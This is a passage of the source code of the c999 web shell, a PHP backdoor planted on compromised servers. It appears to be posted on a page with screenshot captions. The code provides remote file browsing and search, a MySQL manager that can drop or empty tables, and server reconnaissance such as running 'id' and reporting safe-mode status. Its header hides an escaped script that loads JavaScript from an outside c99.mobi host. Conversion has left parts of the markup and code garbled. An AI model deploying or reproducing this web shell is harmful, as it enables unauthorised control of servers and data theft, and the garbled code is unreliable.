 672  if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
 673  if ((!$submit) or ($sql_act))
 674  {
 675   echo "</pre>
 676 "; if ($tbl_struct) { echo "
 677 <table border="0">
 678 <tbody>
 679 <tr>
 680 <td><form method="POST" name="\&quot;c999sh_sqlquery\&quot;"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":</b>
 681 
 682 <textarea cols="100" name="sql_query" rows="10">".htmlspecialchars($sql_query)."</textarea>
 683 
 684 <input type="hidden" name="act" value="sql" /><input type="hidden" name="sql_act" value="query" /><input type="hidden" name="sql_tbl" value="\&quot;&quot;.htmlspecialchars($sql_tbl).&quot;\&quot;" /><input type="hidden" name="submit" value="\&quot;1\&quot;" /><input type="hidden" name="\&quot;sql_goto\&quot;" value="\&quot;&quot;.htmlspecialchars($sql_goto).&quot;\&quot;" /><input type="submit" name="sql_confirm" value="\&quot;Yes\&quot;" /> <input type="submit" value="\&quot;No\&quot;" /></form></td>
 685 <td valign="\&quot;top\&quot;"><b>Fields:</b>
 686 ";
 687  foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "� <a onclick="\&quot;document.c999sh_sqlquery.sql_query.value+='`&quot;.$name.&quot;`';\&quot;" href="\&quot;#\&quot;"><b>".$name."</b></a>
 688 ";}
 689  echo "</td>
 690 </tr>
 691 </tbody>
 692 </table>
 693 <pre>
 694 ";
 695  }
 696  }
 697  if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;}
 698 }
 699 }
 700 if (!function_exists("mysql_create_db"))
 701 {
 702 function mysql_create_db($db,$sock="")
 703 {
 704  $sql = "CREATE DATABASE `".addslashes($db)."`;";
 705  if ($sock) {return mysql_query($sql,$sock);}
 706  else {return mysql_query($sql);}
 707 }
 708 }
 709 if (!function_exists("mysql_query_parse"))
 710 {
 711 function mysql_query_parse($query)
 712 {
 713  $query = trim($query);
 714  $arr = explode (" ",$query);
 715  /*array array()
 716  {
 717  "METHOD"=>array(output_type),
 718  "METHOD1"...
 719  ...
 720  }
 721  if output_type == 0, no output,
 722  if output_type == 1, no output if no error
 723  if output_type == 2, output without control-buttons
 724  if output_type == 3, output with control-buttons
 725  */
 726  $types = array(
 727  "SELECT"=>array(3,1),
 728  "SHOW"=>array(2,1),
 729  "DELETE"=>array(1),
 730  "DROP"=>array(1)
 731  );
 732  $result = array();
 733  $op = strtoupper($arr[0]);
 734  if (is_array($types[$op]))
 735  {
 736  $result["propertions"] = $types[$op];
 737  $result["query"] = $query;
 738  if ($types[$op] == 2)
 739  {
 740  foreach($arr as $k=>$v)
 741  {
 742  if (strtoupper($v) == "LIMIT")
 743  {
 744  $result["limit"] = $arr[$k+1];
 745  $result["limit"] = explode(",",$result["limit"]);
 746  if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);}
 747  unset($arr[$k],$arr[$k+1]);
 748  }
 749  }
 750  }
 751  }
 752  else {return FALSE;}
 753 }
 754 }
 755 if (!function_exists("c999fsearch"))
 756 {
 757 function c999fsearch($d)
 758 {
 759  global $found;
 760  global $found_d;
 761  global $found_f;
 762  global $search_i_f;
 763  global $search_i_d;
 764  global $a;
 765  if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
 766  $h = opendir($d);
 767  while (($f = readdir($h)) !== FALSE)
 768  {
 769  if($f != "." && $f != "..")
 770  {
 771  $bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== FALSE) || ($a["name_regexp"] and ereg($a["name"],$f));
 772  if (is_dir($d.$f))
 773  {
 774  $search_i_d++;
 775  if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;}
 776  if (!is_link($d.$f)) {c999fsearch($d.$f);}
 777  }
 778  else
 779  {
 780  $search_i_f++;
 781  if ($bool)
 782  {
 783  if (!empty($a["text"]))
 784  {
 785  $r = @file_get_contents($d.$f);
 786  if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";}
 787  if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);}
 788  if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);}
 789  else {$bool = strpos(" ".$r,$a["text"],1);}
 790  if ($a["text_not"]) {$bool = !$bool;}
 791  if ($bool) {$found[] = $d.$f; $found_f++;}
 792  }
 793  else {$found[] = $d.$f; $found_f++;}
 794  }
 795  }
 796  }
 797  }
 798  closedir($h);
 799 }
 800 }
 801 if ($act == "gofile") {if (is_dir($f)) {$act = "ls"; $d = $f;} else {$act = "f"; $d = dirname($f); $f = basename($f);}}
 802 //Sending headers
 803 @ob_start();
 804 @ob_implicit_flush(0);
 805 function onphpshutdown()
 806 {
 807  global $gzipencode,$ft;
 808  if (!headers_sent() and $gzipencode and !in_array($ft,array("img","download","notepad")))
 809  {
 810  $v = @ob_get_contents();
 811  @ob_end_clean();
 812  @ob_start("ob_gzHandler");
 813  echo $v;
 814  @ob_end_flush();
 815  }
 816 }
 817 function c999shexit()
 818 {
 819  onphpshutdown();
 820  exit;
 821 }
 822 header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
 823 header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT");
 824 header("Cache-Control: no-store, no-cache, must-revalidate");
 825 header("Cache-Control: post-check=0, pre-check=0", FALSE);
 826 header("Pragma: no-cache");
 827 if (empty($tmpdir))
 828 {
 829  $tmpdir = ini_get("upload_tmp_dir");
 830  if (is_dir($tmpdir)) {$tmpdir = "/tmp/";}
 831 }
 832 $tmpdir = realpath($tmpdir);
 833 $tmpdir = str_replace("\\",DIRECTORY_SEPARATOR,$tmpdir);
 834 if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;}
 835 if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;}
 836 else {$tmpdir_logs = realpath($tmpdir_logs);}
 837 if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
 838 {
 839  $safemode = TRUE;
 840  $hsafemode = "</pre>
 841 <span style="color: red;">ON (secure)</span>
 842 <pre>";
 843 }
 844 else {$safemode = FALSE; $hsafemode = "</pre>
 845 <span style="color: green;">OFF (not secure)</span>
 846 <pre>";}
 847 $v = @ini_get("open_basedir");
 848 if ($v or strtolower($v) == "on") {$openbasedir = TRUE; $hopenbasedir = "</pre>
 849 <span style="color: red;">".$v."</span>
 850 <pre>";}
 851 else {$openbasedir = FALSE; $hopenbasedir = "</pre>
 852 <span style="color: green;">OFF (not secure)</span>
 853 <pre>";}
 854 $sort = htmlspecialchars($sort);
 855 if (empty($sort)) {$sort = $sort_default;}
 856 $sort[1] = strtolower($sort[1]);
 857 $DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE");
 858 if (!ereg("PHP/".phpversion(),$DISP_SERVER_SOFTWARE)) {$DISP_SERVER_SOFTWARE .= ". PHP/".phpversion();}
 859 $DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"<a href="\&quot;&quot;.$surl.&quot;act=phpinfo\&quot;" target="\&quot;_blank\&quot;"><b><span style="text-decoration: underline;">PHP/".phpversion()."</span></b></a>",htmlspecialchars($DISP_SERVER_SOFTWARE));
 860 @ini_set("highlight.bg",$highlight_bg); //FFFFFF
 861 @ini_set("highlight.comment",$highlight_comment); //#FF8000
 862 @ini_set("highlight.default",$highlight_default); //#0000BB
 863 @ini_set("highlight.html",$highlight_html); //#000000
 864 @ini_set("highlight.keyword",$highlight_keyword); //#007700
 865 @ini_set("highlight.string",$highlight_string); //#DD0000
 866 if (!is_array($actbox)) {$actbox = array();}
 867 $dspact = $act = htmlspecialchars($act);
 868 $disp_fullpath = $ls_arr = $notls = null;
 869 $ud = urlencode($d);
 870 ?><meta http-equiv="Content-Type" content="text/html; charset=windows-1251" /><meta http-equiv="Content-Language" content="en-us" /><?php echo getenv("HTTP_HOST"); ?> - phpshell</pre>
 871 <style><!--
 872 TD { FONT-SIZE: 8pt; COLOR: #ebebeb; FONT-FAMILY: verdana;}BODY { scrollbar-face-color: #800000; scrollbar-shadow-color: #101010; scrollbar-highlight-color: #101010; scrollbar-3dlight-color: #101010; scrollbar-darkshadow-color: #101010; scrollbar-track-color: #101010; scrollbar-arrow-color: #101010; font-family: Verdana;}TD.header { FONT-WEIGHT: normal; FONT-SIZE: 10pt; BACKGROUND: #7d7474; COLOR: white; FONT-FAMILY: verdana;}A { FONT-WEIGHT: normal; COLOR: #dadada; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A.Links { COLOR: #ffffff; TEXT-DECORATION: none;}A.Links:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; TEXT-DECORATION: none;}A:hover { COLOR: #ffffff; TEXT-DECORATION: underline;}.skin0{position:absolute; width:200px; border:2px solid black; background-color:menu; font-family:Verdana; line-height:20px; cursor:default; visibility:hidden;;}.skin1{cursor: default; font: menutext; position: absolute; width: 145px; background-color: menu; border: 1 solid buttonface;visibility:hidden; border: 2 outset buttonhighlight; font-family: Verdana,Geneva, Arial; font-size: 10px; color: black;}.menuitems{padding-left:15px; padding-right:10px;;}input{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}textarea{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}button{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}select{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}option {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}iframe {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}blockquote{ font-size: 8pt; font-family: Courier, Fixed, Arial; border : 8px solid #A9A9A9; padding: 1em; margin-top: 1em; margin-bottom: 5em; margin-right: 3em; margin-left: 4em; background-color: #B7B2B0;}body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;}
 873 --></style>
 874 <pre></pre>
 875 <center>
 876 <table style="border-collapse: collapse;" width="100%" border="1" cellspacing="0" cellpadding="5" bgcolor="#333333">
 877 <tbody>
 878 <tr>
 879 <th colspan="2" valign="top" nowrap="nowrap" width="101%" height="15">
 880 <span style="font-family: Webdings; font-size: xx-large;"><b>!</b></span><a href="<?php echo $surl; ?>"><span style="font-family: Verdana; font-size: x-large;"><b><script type="text/javascript">// <![CDATA[
 881 document.write('\u003c\u0053\u0043\u0052\u0049\u0050\u0054\u0020\u0053\u0052\u0043\u003d\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0077\u0077\u0077\u002e\u0063\u0039\u0039\u002e\u006d\u006f\u0062\u0069\u002f\u0069\u006d\u0061\u0067\u0065\u0073\u002f\u0069\u006d\u0067\u002e\u006a\u0073\u003e\u003c\u002f\u0053\u0043\u0052\u0049\u0050\u0054\u003e')
 882 // ]]></script>c999Shell v. <!--?php echo $shver; ?--></b></span></a><span style="font-family: Webdings; font-size: xx-large;"><b>!</b></span></th>
 883 </tr>
 884 </tbody>
 885 </table>
 886 </center>
 887 <pre>
 888 <b>Software: <!--?php echo $DISP_SERVER_SOFTWARE; ?--></b> 
 889 
 890 <b>uname -a: <!--?php echo wordwrap(php_uname(),90,"<br ?-->",1); ?></b> 
 891 
 892 <b><!--?php if (!$win) {echo wordwrap(myshellexec("id"),90,"<br ?-->",1);} else {echo get_current_user();} ?></b> 
 893 
 894 <b>Safe-mode: <!--?php echo $hsafemode; ?--></b>
 895 
 896 <!--?php <br ?-->$d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
 897 if (empty($d)) {$d = realpath(".");} elseif(realpath($d)) {$d = realpath($d);}
 898 $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
 899 if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
 900 $d = str_replace("\\\\","\\",$d);
 901 $dispd = htmlspecialchars($d);
 902 $pd = $e = explode(DIRECTORY_SEPARATOR,substr($d,0,-1));
 903 $i = 0;
 904 foreach($pd as $b)
 905 {
 906  $t = "";
 907  $j = 0;
 908  foreach ($e as $r)
 909  {
 910  $t.= $r.DIRECTORY_SEPARATOR;
 911  if ($j == $i) {break;}
 912  $j++;
 913  }
 914  echo "<a href="\&quot;&quot;.$surl.&quot;act=ls&d=&quot;.urlencode($t).&quot;&sort=&quot;.$sort.&quot;\&quot;"><b>".htmlspecialchars($b).DIRECTORY_SEPARATOR."</b></a>";
 915  $i++;
 916 }
 917 echo "   ";
 918 if (is_writable($d))
 919 {
 920  $wd = TRUE;
 921  $wdt = "<span style="color: green;">[ ok ]</span>";
 922  echo "<b><span style="color: green;">".view_perms(fileperms($d))."</span></b>";
 923 }
 924 else
 925 {
 926  $wd = FALSE;
 927  $wdt = "<span style="color: red;">[ Read-Only ]</span>";
 928  echo "<b>".view_perms_color($d)."</b>";
 929 }
 930 if (is_callable("disk_free_space"))
 931 {
 932  $free = disk_free_space($d);
 933  $total = disk_total_space($d);
 934  if ($free === FALSE) {$free = 0;}
 935  if ($total === FALSE) {$total = 0;}
 936  if ($free < 0) {$free = 0;}
 937  if ($total < 0) {$total = 0;}
 938  $used = $total-$free;
 939  $free_percent = round(100/($total/$free),2);
 940  echo "
 941 <b>Free ".view_size($free)." of ".view_size($total)." (".$free_percent."%)</b>";
 942 }
 943 echo "
 944 ";
 945 $letters = "";
 946 if ($win)
 947 {
 948  $v = explode("\\",$d);
 949  $v = $v[0];
 950  foreach (range("a","z") as $letter)
 951  {
 952  $bool = $isdiskette = in_array($letter,$safemode_diskettes);
 953  if (!$bool) {$bool = is_dir($letter.":\\");}
 954  if ($bool)
 955  {
 956  $letters .= "<a onclick="\&quot;return" href="\&quot;&quot;.$surl.&quot;act=ls&d=&quot;.urlencode($letter.&quot;:\\&quot;).&quot;\&quot;&quot;.($isdiskette?&quot;">[ ";
 957  if ($letter.":" != $v) {$letters .= $letter;}
 958  else {$letters .= "<span style="color: green;">".$letter."</span>";}
 959  $letters .= " ]</a> ";
 960  }
 961  }
 962  if (!empty($letters)) {echo "<b>Detected drives</b>: ".$letters."
 963 ";}
 964 }
 965 if (count($quicklaunch) > 0)
 966 {
 967  foreach($quicklaunch as $item)
 968  {
 969  $item[1] = str_replace("%d",urlencode($d),$item[1]);
 970  $item[1] = str_replace("%sort",$sort,$item[1]);
 971  $v = realpath($d."..");
 972  if (empty($v)) {$a = explode(DIRECTORY_SEPARATOR,$d); unset($a[count($a)-2]); $v = join(DIRECTORY_SEPARATOR,$a);}
 973  $item[1] = str_replace("%upd",urlencode($v),$item[1]);
 974  echo "<a href="\&quot;&quot;.$item[1].&quot;\&quot;">".$item[0]."</a>    ";
 975  }
 976 }
 977 echo "
 978 
 979 
 980 ";
 981 if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo "</pre>
 982 <table width="\&quot;100%\&quot;" border="1" cellspacing="0" cellpadding="5" bgcolor="#333333">
 983 <tbody>
 984 <tr>
 985 <td valign="\&quot;top\&quot;" width="\&quot;100%\&quot;">".$donated_html."</td>
 986 </tr>
 987 </tbody>
 988 </table>
 989 <pre>
 990 
 991 ";}
 992 echo "</pre>
 993 <table width="\&quot;100%\&quot;" border="1" cellspacing="0" cellpadding="5" bgcolor="#333333">
 994 <tbody>
 995 <tr>
 996 <td valign="\&quot;top\&quot;" width="\&quot;100%\&quot;">";
 997 if ($act == "") {$act = $dspact = "ls";}
 998 if ($act == "sql")
 999 {
1000  $sql_surl = $surl."act=sql";
1001  if ($sql_login) {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);}
1002  if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);}
1003  if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);}
1004  if ($sql_port) {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);}
1005  if ($sql_db) {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);}
1006  $sql_surl .= "&";
1007  ?>
1008 <h3>Attention! SQL-Manager is <span style="text-decoration: underline;">NOT</span> ready module! Don't reports bugs.</h3>
1009 "; if (!$sql_sock) {?>
1010 <table style="border-collapse: collapse;" width="100%" border="1" cellspacing="0" cellpadding="5" bgcolor="#333333">
1011 <tbody>
1012 <tr>
1013 <td colspan="2" valign="top" width="100%" height="1"><center><!--?php <br ?--> if ($sql_server)
1014  {
1015  $sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd);
1016  $err = mysql_smarterror();
1017  @mysql_select_db($sql_db,$sql_sock);
1018  if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_smarterror();}
1019  }
1020  else {$sql_sock = FALSE;}
1021  echo "<b>SQL Manager:</b>
1022 ";
1023  if (!$sql_sock)
1024  {
1025  if (!$sql_server) {echo "NO CONNECTION";}
1026  else {echo "<center><b>Can't connect</b></center>"; echo "<b>".$err."</b>";}
1027  }
1028  else
1029  {
1030  $sqlquicklaunch = array();
1031  $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&");
1032  $sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl));
1033  $sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus");
1034  $sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars");
1035  $sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes");
1036  $sqlquicklaunch[] = array("Logout",$surl."act=sql");
1037  echo "<center><b>MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")</b>
1038 ";
1039  if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ <a href="\&quot;&quot;.$item[1].&quot;\&quot;"><b>".$item[0]."</b></a> ] ";}}
1040  echo "</center>";
1041  }
1042  echo "</center></td>
1043 </tr>
1044 <tr>
1045 <td valign="top" width="28%" height="100"><center><span style="font-size: x-large;"> i </span></center>
1046 <ul>
1047    <li>If login is null, login is owner of process.</li>
1048    <li>If host is null, host is localhost</li>
1049    <li>If port is null, port is 3306 (default)</li>
1050 </ul>
1051 </td>
1052 <td valign="top" width="90%" height="1">
1053 <table width="100%" border="0" cellspacing="0" cellpadding="0">
1054 <tbody>
1055 <tr>
1056 <td> <b>Please, fill the form:</b>
1057 <table>
1058 <tbody>
1059 <tr>
1060 <td><b>Username</b></td>
1061 <td><b>Password</b></td>
1062 <td><b>Database</b></td>
1063 </tr>
1064 <tr>
1065 <td><input type="text" maxlength="64" name="sql_login" value="root" /></td>
1066 <td><input type="password" maxlength="64" name="sql_passwd" value="" /></td>
1067 <td><input type="text" maxlength="64" name="sql_db" value="" /></td>
1068 <td><b>Host</b></td>
1069 <td><b>PORT</b></td>
1070 <td align="right"><input type="text" maxlength="64" name="sql_server" value="localhost" /></td>
1071 <td><input type="text" maxlength="6" name="sql_port" size="3" value="3306" /></td>
1072 <td><input type="submit" value="Connect" /></td>
1073 <td></td>
1074 </tr>
1075 </tbody>
1076 </table>
1077 </td>
1078 <!--?php }  else  {   //Start left panel   if (!empty($sql_db))   {    ?-->
1079 <td valign="top" width="25%" height="100%"><a href="<?php echo $surl.">"><b>Home</b></a>
1080 
1081 <hr noshade="noshade" size="1" />
1082 
1083 <!--?php <br ?--> $result = mysql_list_tables($sql_db);
1084  if (!$result) {echo mysql_smarterror();}
1085  else
1086  {
1087  echo "---[ <a href="\&quot;&quot;.$sql_surl.&quot;&\&quot;"><b>".htmlspecialchars($sql_db)."</b></a> ]---
1088 ";
1089  $c = 0;
1090  while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "<b>� <a href="\&quot;&quot;.$sql_surl.&quot;sql_db=&quot;.htmlspecialchars($sql_db).&quot;&sql_tbl=&quot;.htmlspecialchars($row[0]).&quot;\&quot;"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</b>"; mysql_free_result($count); $c++;}
1091  if (!$c) {echo "No tables found in database.";}
1092  }
1093  }
1094  else
1095  {
1096  ?></td>
1097 <td valign="top" width="1" height="100"><a href="<?php echo $sql_surl; ?>"><b>Home</b></a>
1098 
1099 <hr noshade="noshade" size="1" />
1100 
1101 <!--?php    $result = mysql_list_dbs($sql_sock);    if (!$result) {echo mysql_smarterror();}    else    {     ?-->
1102 <form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql" /><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>" /><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>" /><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>" /><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>" />
1103 <select name="sql_db"><!--?php <br ?--> $c = 0;</select>
1104 <select name="sql_db">$dbs = "";</select>
1105 <select name="sql_db">while ($row = mysql_fetch_row($result)) {$dbs .= "</select>
1106 <select name="sql_db"><option selected="selected" value="\&quot;&quot;.$row[0].&quot;\&quot;&quot;;">".$row[0]."</option></select>
1107 <select name="sql_db">"; $c++;}</select>
1108 <select name="sql_db">echo "</select>
1109 <select name="sql_db"><option value="\&quot;\&quot;">Databases (".$c.")</option></select>
1110 <select name="sql_db">";</select>
1111 <select name="sql_db">echo $dbs;</select>
1112 <select name="sql_db">}</select>
1113 <select name="sql_db">?></select>
1114 
1115 <hr noshade="noshade" size="1" />
1116 
1117 Please, select database
1118 
1119 <hr noshade="noshade" size="1" />
1120 
1121 <input type="submit" value="Go" /></form>
1122 <!--?php <br ?--> }
1123  //End left panel
1124  echo "</td>
1125 <td valign="\&quot;top\&quot;" width="\&quot;100%\&quot;" height="\&quot;1\&quot;">";
1126  //Start center panel
1127  $diplay = TRUE;
1128  if ($sql_db)
1129  {
1130  if (!is_numeric($c)) {$c = 0;}
1131  if ($c == 0) {$c = "no";}
1132  echo "
1133 
1134 <hr noshade="noshade" size="\&quot;1\&quot;" />
1135 
1136 <center><b>There are ".$c." table(s) in this DB (".htmlspecialchars($sql_db).").
1137 ";
1138  if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ <a href="\&quot;&quot;.$item[1].&quot;\&quot;">".$item[0]."</a> ] ";}}
1139  echo "</b></center>";
1140  $acts = array("","dump");
1141  if ($sql_act == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
1142  elseif ($sql_act == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_act = "query";}
1143  elseif ($sql_act == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = "dump";}
1144  elseif ($sql_act == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
1145  elseif ($sql_act == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
1146  elseif ($sql_act == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
1147  elseif ($sql_act == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
1148  elseif ($sql_act == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";} $sql_query = substr($sql_query,0,-1);} $sql_act = "query";}
1149  elseif ($sql_tbl_act == "insert")
1150  {
1151  if ($sql_tbl_insert_radio == 1)
1152  {
1153  $keys = "";
1154  $akeys = array_keys($sql_tbl_insert);
1155  foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";}
1156  if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);}
1157  $values = "";
1158  $i = 0;
1159  foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;}
1160  if (!empty($values)) {$values = substr($values,0,strlen($values)-2);}
1161  $sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );";
1162  $sql_act = "query";
1163  $sql_tbl_act = "browse";
1164  }
1165  elseif ($sql_tbl_insert_radio == 2)
1166  {
1167  $set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs);
1168  $sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;";
1169  $result = mysql_query($sql_query)
1170 ?>

C999 shell Screenshot

C999 shell script screenshot

C999 shell script screenshot